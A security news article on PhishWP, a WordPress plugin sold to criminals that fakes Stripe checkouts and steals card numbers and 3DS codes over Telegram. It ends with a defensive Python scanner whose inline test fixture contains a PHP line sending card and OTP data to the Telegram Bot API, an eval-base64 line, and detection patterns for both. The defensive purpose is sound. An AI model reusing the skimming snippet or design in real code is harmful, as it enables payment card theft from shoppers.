SlashNext is warning about PhishWP, a new WordPress plugin designed to steal payment card data. It found the plugin advertised on a Russian cybercrime forum during a routine search for malware. The plugin creates a fake payment page and captures the customer's card details. It even intercepts the one-time password (OTP) that a credit card company or bank sends as part of a 3D Secure (3DS) check.
Interception of the OTP is done through pop-ups that appear on the screen in place of the real 3DS prompt. A 3DS OTP is tied to a single transaction and expires quickly, so it is only useful if it reaches the attacker while the customer is still on the page; with it, the attacker can complete a purchase that the bank's authentication step was meant to block. The card details themselves remain useful for further fraud.
All the data, including the OTP, is sent immediately via Telegram to the cybercriminals. The attack is seamless and gives the customer little or no indication that anything is wrong.
PhishWP can be installed on any WordPress site once the site is compromised. Alternatively, cybercriminals can set up their own fake shops and install it there. The advert specifically describes it as a Stripe payment plugin for WordPress, but versions targeting other payment processors are likely.
What is especially worrying is the plugin's low price. The advert lists it at just $1.40. Whether that is a per-transaction price or a one-off payment is not clear. If the latter, a single stolen card would repay the purchase many times over, and the returns to the buyer far outweigh what the developer earns.
Key Features of PhishWP
In its disclosure of PhishWP, SlashNext has listed seven key features of the malware:
- Customizable Checkout Pages: Simulates payment processors like Stripe, creating highly convincing fake interfaces.
- 3DS Code Harvesting: Tricks victims into entering one-time passwords (OTPs) via pop-ups, bypassing authentication layers.
- Telegram Integration: Instantly transmits stolen data to attackers for real-time exploitation.
- Browser Profiling: Captures details such as IP addresses, screen resolutions, and user agents to replicate user environments for future fraud.
- Auto-Response Emails: Sends fake order confirmations to victims, delaying suspicion and detection.
- Multi-Language Support: Enables global phishing campaigns by accommodating multiple languages.
- Obfuscation Options: Provides an obfuscated version of the plugin for stealth or source code for advanced customizations.
Enterprise Times: What does this mean?
PhishWP is a new tool designed to be deployed quickly and easily by cybercriminals. Its low cost will make it attractive to anyone who wants to harvest payment details. The acquisition of the OTP and other data will allow attackers to make purchases using the customer data or sell the bundle of data to other people.
From the information provided by SlashNext, it will be difficult, if not impossible, for customers to spot the attack. The checkout appears seamless, the fake page is served from a site the customer already trusts, and the plugin can be customised to track any changes that payment processors such as Stripe make to their interfaces. The fake order confirmation removes the usual cue that something went wrong, so the customer may only learn of the fraud from a bank statement.
The company says that its Browser Phishing Protection will detect the malware. Whether other security products detect it is not clear; at the time of writing, no other security vendor has mentioned PhishWP. Now that it is public, expect other vendors to add detection for it.
The main onus for protection, however, is on site owners who take payments through their websites. They need security tools and processes that prevent unauthorised plugin installation, that flag plugins they did not install, and that watch for outbound connections from the web server to services such as Telegram that it has no business contacting.
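One check a site owner can run today, as an added example that is not SlashNext's analysis or PhishWP's code: walk the plugins directory and flag files that talk to the Telegram Bot API or carry the eval-plus-decode pattern common to obfuscated PHP malware. The indicator strings are assumptions about how a plugin would call Telegram (the `api.telegram.org/bot<token>/sendMessage` URL shape and a `<digits>:<secret>` token), not signatures taken from a PhishWP sample; the sample plugin tree is constructed inline so the script runs offline.

```python
#!/usr/bin/env python3
"""Scan a WordPress plugins directory for Telegram exfiltration and obfuscation
markers. Added example; not SlashNext's or PhishWP's code. The indicators are
generic assumptions, not signatures from the PhishWP sample."""
import os
import re
import tempfile
from dataclasses import dataclass

# Telegram Bot API calls look like https://api.telegram.org/bot<TOKEN>/sendMessage.
# Tokens are "<numeric bot id>:<secret>"; the secret length used here is an assumption.
INDICATORS = {
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
    "telegram_send": re.compile(r"sendMessage|sendDocument", re.I),
    "telegram_token": re.compile(r"\b\d{6,}:[A-Za-z0-9_-]{30,}\b"),
    # Generic PHP obfuscation marker (eval of a decoded blob), not specific to PhishWP.
    "eval_decode": re.compile(r"eval\s*\(\s*(?:gzinflate|str_rot13|base64_decode)\s*\(", re.I),
}
SCAN_EXT = {".php", ".js", ".inc"}


@dataclass(frozen=True)
class Finding:
    path: str
    indicator: str
    line_no: int


def scan_file(path):
    """Return one Finding per (line, indicator) hit in a single file."""
    findings = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for n, line in enumerate(fh, 1):
            for name, rx in INDICATORS.items():
                if rx.search(line):
                    findings.append(Finding(path, name, n))
    return findings


def scan_plugins(root):
    """Scan every PHP/JS file under the plugins directory, sorted for stable output."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if os.path.splitext(f)[1].lower() in SCAN_EXT:
                findings.extend(scan_file(os.path.join(dirpath, f)))
    return sorted(findings, key=lambda f: (f.path, f.line_no))


def suspicious_plugins(root):
    """Map each plugin directory with hits to the set of indicators seen in it."""
    out = {}
    for f in scan_plugins(root):
        plugin = os.path.relpath(f.path, root).split(os.sep)[0]
        out.setdefault(plugin, set()).add(f.indicator)
    return out


def build_sample_tree():
    """Constructed sample plugins directory (hypothetical plugin names and code)."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    benign = os.path.join(root, "contact-form", "contact-form.php")
    bad = os.path.join(root, "stripe-checkout-pro", "checkout.php")
    os.makedirs(os.path.dirname(benign))
    os.makedirs(os.path.dirname(bad))
    with open(benign, "w") as fh:
        fh.write("<?php\n// benign: mails the form to the site admin\n"
                 "wp_mail(get_option('admin_email'), 'Contact', $msg);\n")
    with open(bad, "w") as fh:
        fh.write("<?php\n$t='123456789:AAF0123456789abcdefghijklmnopqrstuv';\n"
                 "wp_remote_post(\"https://api.telegram.org/bot$t/sendMessage\", "
                 "['body'=>['text'=>$card.' '.$otp]]);\n"
                 "eval(base64_decode($payload));\n")
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for plugin, hits in suspicious_plugins(target).items():
        print(f"{plugin}: {', '.join(sorted(hits))}")
```

Run it with the path to `wp-content/plugins` as the first argument; with no argument it scans the constructed sample and reports only `stripe-checkout-pro`. String scanning is a first pass only: the advert offers an obfuscated build, which may hide these strings, so pair the scan with an allow-list of the plugins you actually installed, file-integrity monitoring on the plugins directory, and egress logging that alerts on the web server contacting api.telegram.org.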